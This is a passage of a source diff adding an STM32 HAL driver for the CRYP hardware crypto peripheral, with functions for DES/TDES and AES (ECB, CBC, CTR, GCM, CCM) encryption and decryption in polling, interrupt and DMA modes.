HAL_CRYP_OUTPUT_COMPLETE_CB_ID : + hcryp->OutCpltCallback = HAL_CRYP_OutCpltCallback; /* Legacy weak OutCpltCallback */ + break; + + case HAL_CRYP_ERROR_CB_ID : + hcryp->ErrorCallback = HAL_CRYP_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_CRYP_MSPINIT_CB_ID : + hcryp->MspInitCallback = HAL_CRYP_MspInit; + break; + + case HAL_CRYP_MSPDEINIT_CB_ID : + hcryp->MspDeInitCallback = HAL_CRYP_MspDeInit; + break; + + default : + /* Update the error code */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hcryp->State == HAL_CRYP_STATE_RESET) + { + switch (CallbackID) + { + case HAL_CRYP_MSPINIT_CB_ID : + hcryp->MspInitCallback = HAL_CRYP_MspInit; + break; + + case HAL_CRYP_MSPDEINIT_CB_ID : + hcryp->MspDeInitCallback = HAL_CRYP_MspDeInit; + break; + + default : + /* Update the error code */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hcryp); + + return status; +} +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ +/** + * @} + */ + +/** @defgroup CRYP_Exported_Functions_Group2 Encrypt Decrypt functions + * @brief processing functions. + * +@verbatim + ============================================================================== + ##### Encrypt Decrypt functions ##### + ============================================================================== + [..] This section provides API allowing to Encrypt/Decrypt Data following + Standard DES/TDES or AES, and Algorithm configured by the user: + (+) Standard DES/TDES only supported by CRYP1 IP, below list of Algorithm supported : + - Electronic Code Book(ECB) + - Cipher Block Chaining (CBC) + (+) Standard AES supported by CRYP1 IP & TinyAES, list of Algorithm supported: + - Electronic Code Book(ECB) + - Cipher Block Chaining (CBC) + - Counter mode (CTR) + - Cipher Block Chaining (CBC) + - Counter mode (CTR) + - Galois/counter mode (GCM) + - Counter with Cipher Block Chaining-Message(CCM) + [..] Three processing functions are available: + (+) Polling mode : HAL_CRYP_Encrypt & HAL_CRYP_Decrypt + (+) Interrupt mode : HAL_CRYP_Encrypt_IT & HAL_CRYP_Decrypt_IT + (+) DMA mode : HAL_CRYP_Encrypt_DMA & HAL_CRYP_Decrypt_DMA + +@endverbatim + * @{ + */ + + +/** + * @brief Encryption mode. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @param Input: Pointer to the input buffer (plaintext) + * @param Size: Length of the plaintext buffer in word. + * @param Output: Pointer to the output buffer(ciphertext) + * @param Timeout: Specify Timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CRYP_Encrypt(CRYP_HandleTypeDef *hcryp, uint32_t *Input, uint16_t Size, uint32_t *Output, + uint32_t Timeout) +{ + uint32_t algo; + HAL_StatusTypeDef status; + + if (hcryp->State == HAL_CRYP_STATE_READY) + { + /* Change state Busy */ + hcryp->State = HAL_CRYP_STATE_BUSY; + + /* Process locked */ + __HAL_LOCK(hcryp); + + /* Reset CrypInCount, CrypOutCount and Initialize pCrypInBuffPtr and pCrypOutBuffPtr parameters*/ + hcryp->CrypInCount = 0U; + hcryp->CrypOutCount = 0U; + hcryp->pCrypInBuffPtr = Input; + hcryp->pCrypOutBuffPtr = Output; + + /* Calculate Size parameter in Byte*/ + if (hcryp->Init.DataWidthUnit == CRYP_DATAWIDTHUNIT_WORD) + { + hcryp->Size = Size * 4U; + } + else + { + hcryp->Size = Size; + } + +#if defined (CRYP) + /* Set Encryption operating mode*/ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_ALGODIR, CRYP_OPERATINGMODE_ENCRYPT); + + /* algo get algorithm selected */ + algo = hcryp->Instance->CR & CRYP_CR_ALGOMODE; + + switch (algo) + { + case CRYP_DES_ECB: + case CRYP_DES_CBC: + case CRYP_TDES_ECB: + case CRYP_TDES_CBC: + + /*Set Key */ + hcryp->Instance->K1LR = *(uint32_t *)(hcryp->Init.pKey); + hcryp->Instance->K1RR = *(uint32_t *)(hcryp->Init.pKey + 1); + if ((hcryp->Init.Algorithm == CRYP_TDES_ECB) || (hcryp->Init.Algorithm == CRYP_TDES_CBC)) + { + hcryp->Instance->K2LR = *(uint32_t *)(hcryp->Init.pKey + 2); + hcryp->Instance->K2RR = *(uint32_t *)(hcryp->Init.pKey + 3); + hcryp->Instance->K3LR = *(uint32_t *)(hcryp->Init.pKey + 4); + hcryp->Instance->K3RR = *(uint32_t *)(hcryp->Init.pKey + 5); + } + + /*Set Initialization Vector (IV)*/ + if ((hcryp->Init.Algorithm == CRYP_DES_CBC) || (hcryp->Init.Algorithm == CRYP_TDES_CBC)) + { + hcryp->Instance->IV0LR = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IV0RR = *(uint32_t *)(hcryp->Init.pInitVect + 1); + } + + /* Flush FIFO */ + HAL_CRYP_FIFO_FLUSH(hcryp); + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Statrt DES/TDES encryption process */ + status = CRYP_TDES_Process(hcryp, Timeout); + break; + + case CRYP_AES_ECB: + case CRYP_AES_CBC: + case CRYP_AES_CTR: + + /* AES encryption */ + status = CRYP_AES_Encrypt(hcryp, Timeout); + break; + #if defined (CRYP_CR_ALGOMODE_AES_GCM) + case CRYP_AES_GCM: + + /* AES GCM encryption */ + status = CRYP_AESGCM_Process(hcryp, Timeout); + + break; + + case CRYP_AES_CCM: + + /* AES CCM encryption */ + status = CRYP_AESCCM_Process(hcryp, Timeout); + break; + #endif /* GCM CCM defined*/ + default: + hcryp->ErrorCode |= HAL_CRYP_ERROR_NOT_SUPPORTED; + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + +#else /*AES*/ + + /* Set the operating mode*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_ENCRYPT); + + /* algo get algorithm selected */ + algo = hcryp->Instance->CR & AES_CR_CHMOD; + + switch (algo) + { + + case CRYP_AES_ECB: + case CRYP_AES_CBC: + case CRYP_AES_CTR: + + /* AES encryption */ + status = CRYP_AES_Encrypt(hcryp, Timeout); + break; + + case CRYP_AES_GCM_GMAC: + + /* AES GCM encryption */ + status = CRYP_AESGCM_Process(hcryp, Timeout) ; + break; + + case CRYP_AES_CCM: + + /* AES CCM encryption */ + status = CRYP_AESCCM_Process(hcryp, Timeout); + break; + + default: + hcryp->ErrorCode |= HAL_CRYP_ERROR_NOT_SUPPORTED; + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } +#endif /*end AES or CRYP */ + + if (status == HAL_OK) + { + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + } + } + else + { + /* Busy error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_BUSY; + return HAL_ERROR; + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Decryption mode. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @param Input: Pointer to the input buffer (ciphertext ) + * @param Size: Length of the plaintext buffer in word. + * @param Output: Pointer to the output buffer(plaintext) + * @param Timeout: Specify Timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CRYP_Decrypt(CRYP_HandleTypeDef *hcryp, uint32_t *Input, uint16_t Size, uint32_t *Output, + uint32_t Timeout) +{ + HAL_StatusTypeDef status; + uint32_t algo; + + if (hcryp->State == HAL_CRYP_STATE_READY) + { + /* Change state Busy */ + hcryp->State = HAL_CRYP_STATE_BUSY; + + /* Process locked */ + __HAL_LOCK(hcryp); + + /* Reset CrypInCount, CrypOutCount and Initialize pCrypInBuffPtr and pCrypOutBuffPtr parameters*/ + hcryp->CrypInCount = 0U; + hcryp->CrypOutCount = 0U; + hcryp->pCrypInBuffPtr = Input; + hcryp->pCrypOutBuffPtr = Output; + + /* Calculate Size parameter in Byte*/ + if (hcryp->Init.DataWidthUnit == CRYP_DATAWIDTHUNIT_WORD) + { + hcryp->Size = Size * 4U; + } + else + { + hcryp->Size = Size; + } + +#if defined (CRYP) + + /* Set Decryption operating mode*/ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_ALGODIR, CRYP_OPERATINGMODE_DECRYPT); + + /* algo get algorithm selected */ + algo = hcryp->Instance->CR & CRYP_CR_ALGOMODE; + + switch (algo) + { + case CRYP_DES_ECB: + case CRYP_DES_CBC: + case CRYP_TDES_ECB: + case CRYP_TDES_CBC: + + /*Set Key */ + hcryp->Instance->K1LR = *(uint32_t *)(hcryp->Init.pKey); + hcryp->Instance->K1RR = *(uint32_t *)(hcryp->Init.pKey + 1); + if ((hcryp->Init.Algorithm == CRYP_TDES_ECB) || (hcryp->Init.Algorithm == CRYP_TDES_CBC)) + { + hcryp->Instance->K2LR = *(uint32_t *)(hcryp->Init.pKey + 2); + hcryp->Instance->K2RR = *(uint32_t *)(hcryp->Init.pKey + 3); + hcryp->Instance->K3LR = *(uint32_t *)(hcryp->Init.pKey + 4); + hcryp->Instance->K3RR = *(uint32_t *)(hcryp->Init.pKey + 5); + } + + /*Set Initialization Vector (IV)*/ + if ((hcryp->Init.Algorithm == CRYP_DES_CBC) || (hcryp->Init.Algorithm == CRYP_TDES_CBC)) + { + hcryp->Instance->IV0LR = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IV0RR = *(uint32_t *)(hcryp->Init.pInitVect + 1); + } + + /* Flush FIFO */ + HAL_CRYP_FIFO_FLUSH(hcryp); + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Start DES/TDES decryption process */ + status = CRYP_TDES_Process(hcryp, Timeout); + + break; + + case CRYP_AES_ECB: + case CRYP_AES_CBC: + case CRYP_AES_CTR: + + /* AES decryption */ + status = CRYP_AES_Decrypt(hcryp, Timeout); + break; + #if defined (CRYP_CR_ALGOMODE_AES_GCM) + case CRYP_AES_GCM: + + /* AES GCM decryption */ + status = CRYP_AESGCM_Process(hcryp, Timeout) ; + break; + + case CRYP_AES_CCM: + + /* AES CCM decryption */ + status = CRYP_AESCCM_Process(hcryp, Timeout); + break; + #endif /* GCM CCM defined*/ + default: + hcryp->ErrorCode |= HAL_CRYP_ERROR_NOT_SUPPORTED; + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + +#else /*AES*/ + + /* Set Decryption operating mode*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_DECRYPT); + + /* algo get algorithm selected */ + algo = hcryp->Instance->CR & AES_CR_CHMOD; + + switch (algo) + { + + case CRYP_AES_ECB: + case CRYP_AES_CBC: + case CRYP_AES_CTR: + + /* AES decryption */ + status = CRYP_AES_Decrypt(hcryp, Timeout); + break; + + case CRYP_AES_GCM_GMAC: + + /* AES GCM decryption */ + status = CRYP_AESGCM_Process(hcryp, Timeout) ; + break; + + case CRYP_AES_CCM: + + /* AES CCM decryption */ + status = CRYP_AESCCM_Process(hcryp, Timeout); + break; + + default: + hcryp->ErrorCode |= HAL_CRYP_ERROR_NOT_SUPPORTED; + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } +#endif /* End AES or CRYP */ + + if (status == HAL_OK) + { + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + } + } + else + { + /* Busy error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_BUSY; + return HAL_ERROR; + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Encryption in interrupt mode. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @param Input: Pointer to the input buffer (plaintext) + * @param Size: Length of the plaintext buffer in word + * @param Output: Pointer to the output buffer(ciphertext) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CRYP_Encrypt_IT(CRYP_HandleTypeDef *hcryp, uint32_t *Input, uint16_t Size, uint32_t *Output) +{ + uint32_t algo; + HAL_StatusTypeDef status = HAL_OK; + + if (hcryp->State == HAL_CRYP_STATE_READY) + { + /* Change state Busy */ + hcryp->State = HAL_CRYP_STATE_BUSY; + + /* Process locked */ + __HAL_LOCK(hcryp); + + /* Reset CrypInCount, CrypOutCount and Initialize pCrypInBuffPtr and pCrypOutBuffPtr parameters*/ + hcryp->CrypInCount = 0U; + hcryp->CrypOutCount = 0U; + hcryp->pCrypInBuffPtr = Input; + hcryp->pCrypOutBuffPtr = Output; + + /* Calculate Size parameter in Byte*/ + if (hcryp->Init.DataWidthUnit == CRYP_DATAWIDTHUNIT_WORD) + { + hcryp->Size = Size * 4U; + } + else + { + hcryp->Size = Size; + } + +#if defined (CRYP) + + /* Set encryption operating mode*/ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_ALGODIR, CRYP_OPERATINGMODE_ENCRYPT); + + /* algo get algorithm selected */ + algo = (hcryp->Instance->CR & CRYP_CR_ALGOMODE); + + switch (algo) + { + case CRYP_DES_ECB: + case CRYP_DES_CBC: + case CRYP_TDES_ECB: + case CRYP_TDES_CBC: + + /*Set Key */ + hcryp->Instance->K1LR = *(uint32_t *)(hcryp->Init.pKey); + hcryp->Instance->K1RR = *(uint32_t *)(hcryp->Init.pKey + 1); + if ((hcryp->Init.Algorithm == CRYP_TDES_ECB) || (hcryp->Init.Algorithm == CRYP_TDES_CBC)) + { + hcryp->Instance->K2LR = *(uint32_t *)(hcryp->Init.pKey + 2); + hcryp->Instance->K2RR = *(uint32_t *)(hcryp->Init.pKey + 3); + hcryp->Instance->K3LR = *(uint32_t *)(hcryp->Init.pKey + 4); + hcryp->Instance->K3RR = *(uint32_t *)(hcryp->Init.pKey + 5); + } + /* Set the Initialization Vector*/ + if ((hcryp->Init.Algorithm == CRYP_DES_CBC) || (hcryp->Init.Algorithm == CRYP_TDES_CBC)) + { + hcryp->Instance->IV0LR = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IV0RR = *(uint32_t *)(hcryp->Init.pInitVect + 1); + } + + /* Flush FIFO */ + HAL_CRYP_FIFO_FLUSH(hcryp); + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Enable interrupts */ + __HAL_CRYP_ENABLE_IT(hcryp, CRYP_IT_INI | CRYP_IT_OUTI); + + /* Enable CRYP to start DES/TDES process*/ + __HAL_CRYP_ENABLE(hcryp); + break; + + case CRYP_AES_ECB: + case CRYP_AES_CBC: + case CRYP_AES_CTR: + + status = CRYP_AES_Encrypt_IT(hcryp); + break; + #if defined (CRYP_CR_ALGOMODE_AES_GCM) + case CRYP_AES_GCM: + + status = CRYP_AESGCM_Process_IT(hcryp) ; + break; + + case CRYP_AES_CCM: + + status = CRYP_AESCCM_Process_IT(hcryp); + break; + #endif /* GCM CCM defined*/ + default: + hcryp->ErrorCode |= HAL_CRYP_ERROR_NOT_SUPPORTED; + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + status = HAL_ERROR; + break; + } + +#else /* AES */ + + /* Set encryption operating mode*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_ENCRYPT); + + /* algo get algorithm selected */ + algo = hcryp->Instance->CR & AES_CR_CHMOD; + + switch (algo) + { + case CRYP_AES_ECB: + case CRYP_AES_CBC: + case CRYP_AES_CTR: + + /* AES encryption */ + status = CRYP_AES_Encrypt_IT(hcryp); + break; + + case CRYP_AES_GCM_GMAC: + + /* AES GCM encryption */ + status = CRYP_AESGCM_Process_IT(hcryp) ; + break; + + case CRYP_AES_CCM: + + /* AES CCM encryption */ + status = CRYP_AESCCM_Process_IT(hcryp); + break; + + default: + hcryp->ErrorCode |= HAL_CRYP_ERROR_NOT_SUPPORTED; + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + status = HAL_ERROR; + break; + } +#endif /*end AES or CRYP*/ + + } + else + { + /* Busy error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_BUSY; + status = HAL_ERROR; + } + + /* Return function status */ + return status; +} + +/** + * @brief Decryption in itnterrupt mode. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @param Input: Pointer to the input buffer (ciphertext ) + * @param Size: Length of the plaintext buffer in word. + * @param Output: Pointer to the output buffer(plaintext) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CRYP_Decrypt_IT(CRYP_HandleTypeDef *hcryp, uint32_t *Input, uint16_t Size, uint32_t *Output) +{ + uint32_t algo; + HAL_StatusTypeDef status = HAL_OK; + + if (hcryp->State == HAL_CRYP_STATE_READY) + { + /* Change state Busy */ + hcryp->State = HAL_CRYP_STATE_BUSY; + + /* Process locked */ + __HAL_LOCK(hcryp); + + /* Reset CrypInCount, CrypOutCount and Initialize pCrypInBuffPtr and pCrypOutBuffPtr parameters*/ + hcryp->CrypInCount = 0U; + hcryp->CrypOutCount = 0U; + hcryp->pCrypInBuffPtr = Input; + hcryp->pCrypOutBuffPtr = Output; + + /* Calculate Size parameter in Byte*/ + if (hcryp->Init.DataWidthUnit == CRYP_DATAWIDTHUNIT_WORD) + { + hcryp->Size = Size * 4U; + } + else + { + hcryp->Size = Size; + } + +#if defined (CRYP) + + /* Set decryption operating mode*/ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_ALGODIR, CRYP_OPERATINGMODE_DECRYPT); + + /* algo get algorithm selected */ + algo = hcryp->Instance->CR & CRYP_CR_ALGOMODE; + + switch (algo) + { + case CRYP_DES_ECB: + case CRYP_DES_CBC: + case CRYP_TDES_ECB: + case CRYP_TDES_CBC: + + /*Set Key */ + hcryp->Instance->K1LR = *(uint32_t *)(hcryp->Init.pKey); + hcryp->Instance->K1RR = *(uint32_t *)(hcryp->Init.pKey + 1); + if ((hcryp->Init.Algorithm == CRYP_TDES_ECB) || (hcryp->Init.Algorithm == CRYP_TDES_CBC)) + { + hcryp->Instance->K2LR = *(uint32_t *)(hcryp->Init.pKey + 2); + hcryp->Instance->K2RR = *(uint32_t *)(hcryp->Init.pKey + 3); + hcryp->Instance->K3LR = *(uint32_t *)(hcryp->Init.pKey + 4); + hcryp->Instance->K3RR = *(uint32_t *)(hcryp->Init.pKey + 5); + } + + /* Set the Initialization Vector*/ + if ((hcryp->Init.Algorithm == CRYP_DES_CBC) || (hcryp->Init.Algorithm == CRYP_TDES_CBC)) + { + hcryp->Instance->IV0LR = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IV0RR = *(uint32_t *)(hcryp->Init.pInitVect + 1); + } + /* Flush FIFO */ + HAL_CRYP_FIFO_FLUSH(hcryp); + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Enable interrupts */ + __HAL_CRYP_ENABLE_IT(hcryp, CRYP_IT_INI | CRYP_IT_OUTI); + + /* Enable CRYP and start DES/TDES process*/ + __HAL_CRYP_ENABLE(hcryp); + + break; + + case CRYP_AES_ECB: + case CRYP_AES_CBC: + case CRYP_AES_CTR: + + /* AES decryption */ + status = CRYP_AES_Decrypt_IT(hcryp); + break; + #if defined (CRYP_CR_ALGOMODE_AES_GCM) + case CRYP_AES_GCM: + + /* AES GCM decryption */ + status = CRYP_AESGCM_Process_IT(hcryp) ; + break; + + case CRYP_AES_CCM: + + /* AES CCMdecryption */ + status = CRYP_AESCCM_Process_IT(hcryp); + break; + #endif /* GCM CCM defined*/ + default: + hcryp->ErrorCode |= HAL_CRYP_ERROR_NOT_SUPPORTED; + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + status = HAL_ERROR; + break; + } + +#else /*AES*/ + + /* Set decryption operating mode*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_DECRYPT); + + /* algo get algorithm selected */ + algo = hcryp->Instance->CR & AES_CR_CHMOD; + + switch (algo) + { + case CRYP_AES_ECB: + case CRYP_AES_CBC: + case CRYP_AES_CTR: + + /* AES decryption */ + status = CRYP_AES_Decrypt_IT(hcryp); + break; + + case CRYP_AES_GCM_GMAC: + + /* AES GCM decryption */ + status = CRYP_AESGCM_Process_IT(hcryp) ; + break; + + case CRYP_AES_CCM: + + /* AES CCM decryption */ + status = CRYP_AESCCM_Process_IT(hcryp); + break; + + default: + hcryp->ErrorCode |= HAL_CRYP_ERROR_NOT_SUPPORTED; + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + status = HAL_ERROR; + break; + } +#endif /* End AES or CRYP */ + + } + else + { + /* Busy error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_BUSY; + status = HAL_ERROR; + } + + /* Return function status */ + return status; +} + +/** + * @brief Encryption in DMA mode. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @param Input: Pointer to the input buffer (plaintext) + * @param Size: Length of the plaintext buffer in word. + * @param Output: Pointer to the output buffer(ciphertext) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CRYP_Encrypt_DMA(CRYP_HandleTypeDef *hcryp, uint32_t *Input, uint16_t Size, uint32_t *Output) +{ + uint32_t algo; + HAL_StatusTypeDef status = HAL_OK; + uint32_t DoKeyIVConfig = 1U; /* By default, carry out peripheral Key and IV configuration */ + + if (hcryp->State == HAL_CRYP_STATE_READY) + { + /* Change state Busy */ + hcryp->State = HAL_CRYP_STATE_BUSY; + + /* Process locked */ + __HAL_LOCK(hcryp); + + /* Reset CrypInCount, CrypOutCount and Initialize pCrypInBuffPtr and pCrypOutBuffPtr parameters*/ + hcryp->CrypInCount = 0U; + hcryp->CrypOutCount = 0U; + hcryp->pCrypInBuffPtr = Input; + hcryp->pCrypOutBuffPtr = Output; + + /* Calculate Size parameter in Byte*/ + if (hcryp->Init.DataWidthUnit == CRYP_DATAWIDTHUNIT_WORD) + { + hcryp->Size = Size * 4U; + } + else + { + hcryp->Size = Size; + } + +#if defined (CRYP) + + /* Set encryption operating mode*/ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_ALGODIR, CRYP_OPERATINGMODE_ENCRYPT); + + /* algo get algorithm selected */ + algo = hcryp->Instance->CR & CRYP_CR_ALGOMODE; + + switch (algo) + { + case CRYP_DES_ECB: + case CRYP_DES_CBC: + case CRYP_TDES_ECB: + case CRYP_TDES_CBC: + + /*Set Key */ + hcryp->Instance->K1LR = *(uint32_t *)(hcryp->Init.pKey); + hcryp->Instance->K1RR = *(uint32_t *)(hcryp->Init.pKey + 1); + if ((hcryp->Init.Algorithm == CRYP_TDES_ECB) || (hcryp->Init.Algorithm == CRYP_TDES_CBC)) + { + hcryp->Instance->K2LR = *(uint32_t *)(hcryp->Init.pKey + 2); + hcryp->Instance->K2RR = *(uint32_t *)(hcryp->Init.pKey + 3); + hcryp->Instance->K3LR = *(uint32_t *)(hcryp->Init.pKey + 4); + hcryp->Instance->K3RR = *(uint32_t *)(hcryp->Init.pKey + 5); + } + + /* Set the Initialization Vector*/ + if ((hcryp->Init.Algorithm == CRYP_DES_CBC) || (hcryp->Init.Algorithm == CRYP_TDES_CBC)) + { + hcryp->Instance->IV0LR = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IV0RR = *(uint32_t *)(hcryp->Init.pInitVect + 1); + } + + /* Flush FIFO */ + HAL_CRYP_FIFO_FLUSH(hcryp); + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Start DMA process transfer for DES/TDES */ + CRYP_SetDMAConfig(hcryp, (uint32_t)(hcryp->pCrypInBuffPtr), ((uint16_t)(hcryp->Size) / 4U), + (uint32_t)(hcryp->pCrypOutBuffPtr)); + break; + + case CRYP_AES_ECB: + case CRYP_AES_CBC: + case CRYP_AES_CTR: + + if (hcryp->Init.KeyIVConfigSkip == CRYP_KEYIVCONFIG_ONCE) + { + if (hcryp->KeyIVConfig == 1U) + { + /* If the Key and IV configuration has to be done only once + and if it has already been done, skip it */ + DoKeyIVConfig = 0U; + } + else + { + /* If the Key and IV configuration has to be done only once + and if it has not been done already, do it and set KeyIVConfig + to keep track it won't have to be done again next time */ + hcryp->KeyIVConfig = 1U; + } + } + + if (DoKeyIVConfig == 1U) + { + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Set the Initialization Vector*/ + if (hcryp->Init.Algorithm != CRYP_AES_ECB) + { + hcryp->Instance->IV0LR = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IV0RR = *(uint32_t *)(hcryp->Init.pInitVect + 1U); + hcryp->Instance->IV1LR = *(uint32_t *)(hcryp->Init.pInitVect + 2U); + hcryp->Instance->IV1RR = *(uint32_t *)(hcryp->Init.pInitVect + 3U); + } + } /* if (DoKeyIVConfig == 1U) */ + + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Start DMA process transfer for AES */ + CRYP_SetDMAConfig(hcryp, (uint32_t)(hcryp->pCrypInBuffPtr), ((uint16_t)(hcryp->Size) / 4U), + (uint32_t)(hcryp->pCrypOutBuffPtr)); + break; + #if defined (CRYP_CR_ALGOMODE_AES_GCM) + case CRYP_AES_GCM: + /* AES GCM encryption */ + status = CRYP_AESGCM_Process_DMA(hcryp) ; + break; + + case CRYP_AES_CCM: + /* AES CCM encryption */ + status = CRYP_AESCCM_Process_DMA(hcryp); + break; + #endif /* GCM CCM defined*/ + default: + hcryp->ErrorCode |= HAL_CRYP_ERROR_NOT_SUPPORTED; + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + status = HAL_ERROR; + break; + } + +#else /*AES*/ + /* Set encryption operating mode*/ + MODIFY_REG(hcryp->Instance->CR, AES_CR_MODE, CRYP_OPERATINGMODE_ENCRYPT); + + /* algo get algorithm selected */ + algo = hcryp->Instance->CR & AES_CR_CHMOD; + + switch (algo) + { + + case CRYP_AES_ECB: + case CRYP_AES_CBC: + case CRYP_AES_CTR: + + if (hcryp->Init.KeyIVConfigSkip == CRYP_KEYIVCONFIG_ONCE) + { + if (hcryp->KeyIVConfig == 1U) + { + /* If the Key and IV configuration has to be done only once + and if it has already been done, skip it */ + DoKeyIVConfig = 0U; + } + else + { + /* If the Key and IV configuration has to be done only once + and if it has not been done already, do it and set KeyIVConfig + to keep track it won't have to be done again next time */ + hcryp->KeyIVConfig = 1U; + } + } + + if (DoKeyIVConfig == 1U) + { + /* Set the Key*/ + CRYP_SetKey(hcryp, hcryp->Init.KeySize); + + /* Set the Initialization Vector*/ + if (hcryp->Init.Algorithm != CRYP_AES_ECB) + { + hcryp->Instance->IVR3 = *(uint32_t *)(hcryp->Init.pInitVect); + hcryp->Instance->IVR2 = *(uint32_t *)(hcryp->Init.pInitVect + 1); + hcryp->Instance->IVR1 = *(uint32_t *)(hcryp->Init.pInitVect + 2); + hcryp->Instance->IVR0 = *(uint32_t *)(hcryp->Init.pInitVect + 3); + } + } /* if (DoKeyIVConfig == 1U) */ + /* Set the phase */ + hcryp->Phase = CRYP_PHASE_PROCESS; + + /* Start DMA process transfer for AES */ + CRYP_SetDMAConfig(hcryp, (uint32_t)(hcryp->pCrypInBuffPtr), (hcryp->Size / 4U), (uint32_t)(hcryp->pCrypOutBuffPtr)); + break; + + case CRYP_AES_GCM_GMAC: + /* AES GCM encryption */ + status = CRYP_AESGCM_Process_DMA(hcryp) ; + break; + + case CRYP_AES_CCM: + /* AES CCM encryption */ + status = CRYP_AESCCM_Process_DMA(hcryp); + break; + + default: + hcryp->ErrorCode |= HAL_CRYP_ERROR_NOT_SUPPORTED; + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + status = HAL_ERROR; + break; + } +#endif /* End AES or CRYP */ + + } + else + { + /* Busy error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_BUSY; + status = HAL_ERROR; + } + + /* Return function status */ + return status; +} + +/** + * @brief Decryption in DMA mode. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @param Input: Pointer to the input buffer (ciphertext ) + * @param Size: Length of the plaintext buffer in word + * @param Output: Pointer to the output buffer(plaintext) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CRYP_Decrypt_DMA(CRYP_HandleTypeDef *hcryp, uint32_t *Input, uint16_t Size, uint32_t *Output) +{ + uint32_t algo; + HAL_StatusTypeDef status = HAL_OK; + + if (hcryp->State == HAL_CRYP_STATE_READY) + { + + /* Change state Busy */ + hcryp->State = HAL_CRYP_STATE_BUSY; + + /* Process locked */ + __HAL_LOCK(hcryp); + + /* Reset CrypInCount, CrypOutCount and Initialize pCrypInBuffPtr, pCrypOutBuffPtr and Size parameters*/ + hcryp->CrypInCount = 0U; + hcryp->CrypOutCount = 0U; + 